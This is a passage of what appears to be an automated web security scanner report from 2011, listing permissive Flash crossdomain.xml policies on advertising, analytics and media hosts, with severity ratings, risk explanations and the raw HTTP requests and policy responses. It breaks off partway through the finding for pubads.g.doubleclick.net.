Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping.crowdscience.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:57 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Last-Modified: Tue, 26 Apr 2011 18:28:26 GMT
ETag: "85d59-e0-4a1d67d69c680"
Accept-Ranges: bytes
Content-Length: 224
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

3.19. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Thu, 12 May 2011 13:28:27 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

3.20. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Fri, 13 May 2011 13:30:18 GMT
Content-Type: text/xml
Content-Length: 207
Date: Thu, 12 May 2011 13:30:18 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

3.21. http://s.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Thu, 12 May 2011 13:29:36 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
X-Cache: HIT
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

3.22. http://static.crowdscience.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.crowdscience.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static.crowdscience.com

Response

HTTP/1.1 200 OK
Server: CacheFlyServe v26b
Date: Thu, 12 May 2011 13:28:27 GMT
Content-Type: text/xml
Connection: close
ETag: "2c600567b987cf9352b28a7f78e61b56"
X-CF1: fI.iad2:cf:cacheB.iad2-01
Content-Length: 224
Last-Modified: Mon, 15 Mar 2010 02:56:11 GMT
X-CF2: L
Accept-Ranges: bytes

<?xml version="1.0"?>
       <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
       <cross-domain-policy>
               <allow-access-from domain="*" secure="false"/>
       
...[SNIP]...

3.23. http://tags.bluekai.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.bluekai.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.bluekai.com

Response

HTTP/1.0 200 OK
Date: Thu, 12 May 2011 13:28:27 GMT
Last-Modified: Mon, 07 Mar 2011 20:46:41 GMT
ETag: "5f00162-ca-49dea97c4ae40"
Accept-Ranges: bytes
Content-Length: 202
Content-Type: text/xml
Connection: close

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...

3.24. http://tags.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tags.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:57 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Wed, 20 Apr 2011 11:31:48 GMT
ETag: "3978186-ba-4a157f85e5100"
Accept-Ranges: bytes
Content-Length: 186
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>

3.25. http://www.pcworld.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pcworld.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:27:59 GMT
Server: Apache
X-GasHost: gas1
X-GasOriginRetry: 0
X-GasOriginTime: 0
X-Cooking-With: Gasoline-Local
X-Gasoline-Age: 744
Content-Length: 194
Last-Modified: Fri, 11 Feb 2011 21:00:26 GMT
Etag: W/"194-1297458026000"
Content-Type: application/xml
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" /></cross-domain-policy>

3.26. http://adx.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adx.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: adx.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=ISO-8859-1
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 13:30:17 GMT
Expires: Fri, 13 May 2011 13:30:17 GMT
Cache-Control: public, max-age=86400
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.27. http://googleads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Thu, 04 Feb 2010 20:17:40 GMT
Date: Thu, 12 May 2011 10:43:52 GMT
Expires: Fri, 13 May 2011 10:43:52 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=86400
Age: 9943

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.sk" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
<allow-access-from domain="*.google.com.hk" />
<allow-access-from domain="*.google.com.ly" />
<allow-access-from domain="*.google.com.mx" />
<allow-access-from domain="*.google.com.my" />
<allow-access-from domain="*.google.com.pe" />
<allow-access-from domain="*.google.com.ph" />
<allow-access-from domain="*.google.com.pk" />
<allow-access-from domain="*.google.com.ru" />
<allow-access-from domain="*.google.com.sg" />
<allow-access-from domain="*.google.com.tr" />
<allow-access-from domain="*.google.com.tw" />
<allow-access-from domain="*.google.com.ua" />
<allow-access-from domain="*.google.com.vn" />
<allow-access-from domain="*.google.de" />
<allow-access-from domain="*.google.dk" />
<allow-access-from domain="*.google.es" />
<allow-access-from domain="*.google.fi" />
<allow-access-from domain="*.google.fr" />
<allow-access-from domain="*.google.it" />
<allow-access-from domain="*.google.lt" />
<allow-access-from domain="*.google.lv" />
<allow-access-from domain="*.google.nl" />
<allow-access-from domain="*.google.no" />
<allow-access-from domain="*.google.pl" />
<allow-access-from domain="*.google.pt" />
<allow-access-from domain="*.google.ro" />
<allow-access-from domain="*.google.se" />
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="*.ytimg.com" />
<allow-access-from domain="*.2mdn.net" />
<allow-access-from domain="*.doubleclick.net" />
<allow-access-from domain="*.doubleclick.com" />
...[SNIP]...

3.28. http://mads.com.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.com.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.com.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=959
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.29. http://mads.zdnet.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://mads.zdnet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: mads.zdnet.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:30 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 7038
Keep-Alive: timeout=15, max=858
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.bnet.com" />
<allow-access-from domain="*.cbs.com" />
<allow-access-from domain="*.cbsaroundtheworld.com" />
<allow-access-from domain="*.cbsgames.com" />
<allow-access-from domain="*.cbsig.net"/>
<allow-access-from domain="*.cbsnews.com" />
<allow-access-from domain="*.cbssports.com" />
<allow-access-from domain="*.chat.com" />
<allow-access-from domain="*.chow.com" />
<allow-access-from domain="*.chowhound.com" />
<allow-access-from domain="*.cnet.com" />
<allow-access-from domain="*.cnettv.com" />
<allow-access-from domain="*.com.com" />
<allow-access-from domain="*.download.com" />
<allow-access-from domain="*.filmspot.com" />
<allow-access-from domain="*.findarticles.com" />
<allow-access-from domain="*.gamefaqs.com" />
<allow-access-from domain="*.gamerankings.com" />
<allow-access-from domain="*.gamespot.com" />
<allow-access-from domain="*.help.com" />
<allow-access-from domain="*.iphoneatlas.com" />
<allow-access-from domain="*.itpapers.com" />
<allow-access-from domain="*.juke.com" />
<allow-access-from domain="*.last.fm" />
<allow-access-from domain="*.macfixit.com" />
<allow-access-from domain="*.macfixitforums.com" />
<allow-access-from domain="*.maxpreps.com" />
<allow-access-from domain="*.metacritic.com" />
<allow-access-from domain="*.mp3.com" />
<allow-access-from domain="*.moblogic.tv" />
<allow-access-from domain="*.moneywatch.com" />
<allow-access-from domain="*.movietome.com" />
<allow-access-from domain="*.mysimon.com" />
<allow-access-from domain="*.ncaa.com" />
<allow-access-from domain="*.news.com" />
<allow-access-from domain="*.ourchart.com" />
<allow-access-from domain="*.reuters.com" />
<allow-access-from domain="*.search.com" />
<allow-access-from domain="*.shareware.com" />
<allow-access-from domain="*.shopper.com" />
<allow-access-from domain="*.smartplanet.com" />
<allow-access-from domain="*.sportsgamer.com" />
<allow-access-from domain="*.sportsline.com" />
<allow-access-from domain="*.startrek.com" />
<allow-access-from domain="*.techrepublic.com" />
<allow-access-from domain="*.theinsider.com" />
<allow-access-from domain="*.trupreps.com" />
<allow-access-from domain="*.tv.com" />
<allow-access-from domain="*.urbanbaby.com" />
<allow-access-from domain="*.versiontracker.com" />
<allow-access-from domain="*.wallstrip.com" />
<allow-access-from domain="*.webware.com" />
<allow-access-from domain="*.winfiles.com" />
<allow-access-from domain="*.zdnet.com" />
<allow-access-from domain="*.zdnet.com.au" />
<allow-access-from domain="*.zdnet.com.uk" />
<allow-access-from domain="*.zdnetasia.com" />
<allow-access-from domain="*.cbsinteractive.com" />
<allow-access-from domain="*.powervideosuite.com" />
...[SNIP]...
<allow-access-from domain="*.clipsync.com"/>
...[SNIP]...
<allow-access-from domain="212.86.251.190"/>
...[SNIP]...
<allow-access-from domain="*.crunchyroll.com" />
...[SNIP]...
<allow-access-from domain="*.techmatter.com" />
...[SNIP]...
<allow-access-from domain="*.amazon.com" />
...[SNIP]...
<allow-access-from domain="*.aol.com" />
<allow-access-from domain="*.att.com" />
<allow-access-from domain="*.attributor.com" />
<allow-access-from domain="*.bebo.com" />
<allow-access-from domain="*.blinkx.com" />
<allow-access-from domain="*.boxee.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.buddytv.com" />
<allow-access-from domain="*.cbsmobile.com" />
<allow-access-from domain="*.chumby.com" />
<allow-access-from domain="*.comcast.com" />
<allow-access-from domain="*.comcastnet.com" />
<allow-access-from domain="*.cooliris.com" />
<allow-access-from domain="*.dell.com" />
<allow-access-from domain="*.et.com" />
<allow-access-from domain="*.fanpop.com" />
<allow-access-from domain="*.freestream.com" />
<allow-access-from domain="*.fuhu.com" />
<allow-access-from domain="*.gotuit.com" />
<allow-access-from domain="*.grabnetworks.com" />
<allow-access-from domain="*.harpers.com" />
<allow-access-from domain="*.hp.com" />
<allow-access-from domain="*.imdb.com" />
<allow-access-from domain="*.iwidget.com" />
<allow-access-from domain="*.joost.com" />
<allow-access-from domain="*.meevee.com" />
<allow-access-from domain="*.metacafe.com" />
<allow-access-from domain="*.msn.com" />
<allow-access-from domain="*.msnsearch.com" />
<allow-access-from domain="*.netflix.com" />
<allow-access-from domain="*.radio.com" />
<allow-access-from domain="*.sands.com" />
<allow-access-from domain="*.showtime.com" />
<allow-access-from domain="*.slide.com" />
<allow-access-from domain="*.sling.com" />
<allow-access-from domain="*.sony.com" />
<allow-access-from domain="*.tidaltv.com" />
<allow-access-from domain="*.transpond.com" />
<allow-access-from domain="*.tvguide.com" />
<allow-access-from domain="*.tvstations.com" />
<allow-access-from domain="*.veoh.com" />
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.youtube.com" />
...[SNIP]...
<allow-access-from domain="*.bing.com" />
...[SNIP]...
<allow-access-from domain="*.comcast.net" />
<allow-access-from domain="*.fancast.com" />
<allow-access-from domain="*.blinx.com" />
<allow-access-from domain="apps.facebook.com" />
...[SNIP]...
<allow-access-from domain="*.ytimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ustream.tv"/>
...[SNIP]...
<allow-access-from domain="*.sho.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsinteractive.com.au"/>
...[SNIP]...
<allow-access-from domain="*.quantserve.com"/>
...[SNIP]...
<allow-access-from domain="*.cbsimg.net" />
...[SNIP]...
<allow-access-from domain="*.yahoo.net"/>
...[SNIP]...
<allow-access-from domain="*.yimg.com"/>
...[SNIP]...
<allow-access-from domain="*.ooyala.com"/>
...[SNIP]...
<allow-access-from domain="*.yldmgrimg.net"/>
...[SNIP]...
<allow-access-from domain="*.cstv.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonderlabs.com"/>
...[SNIP]...
<allow-access-from domain="*.eyewonder.com"/>
...[SNIP]...
<allow-access-from domain="*.maxpreps.com.edgesuite.net"/>
...[SNIP]...
<allow-access-from domain="*.livestream.com"/>
...[SNIP]...
<allow-access-from domain="*.justin.tv"/>
...[SNIP]...
<allow-access-from domain="*.adap.tv"/>
...[SNIP]...

3.30. http://network.alluremedia.com.au/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://network.alluremedia.com.au
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: network.alluremedia.com.au

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:29:54 GMT
Server: Apache/2.2.9
Last-Modified: Thu, 31 Mar 2011 02:37:43 GMT
ETag: "7e470-d3-49fbe2d82ebc0"
Accept-Ranges: bytes
Content-Length: 211
Vary: User-Agent
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.edgefcs.net" />
</cross-dom
...[SNIP]...

3.31. http://pubads.g.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

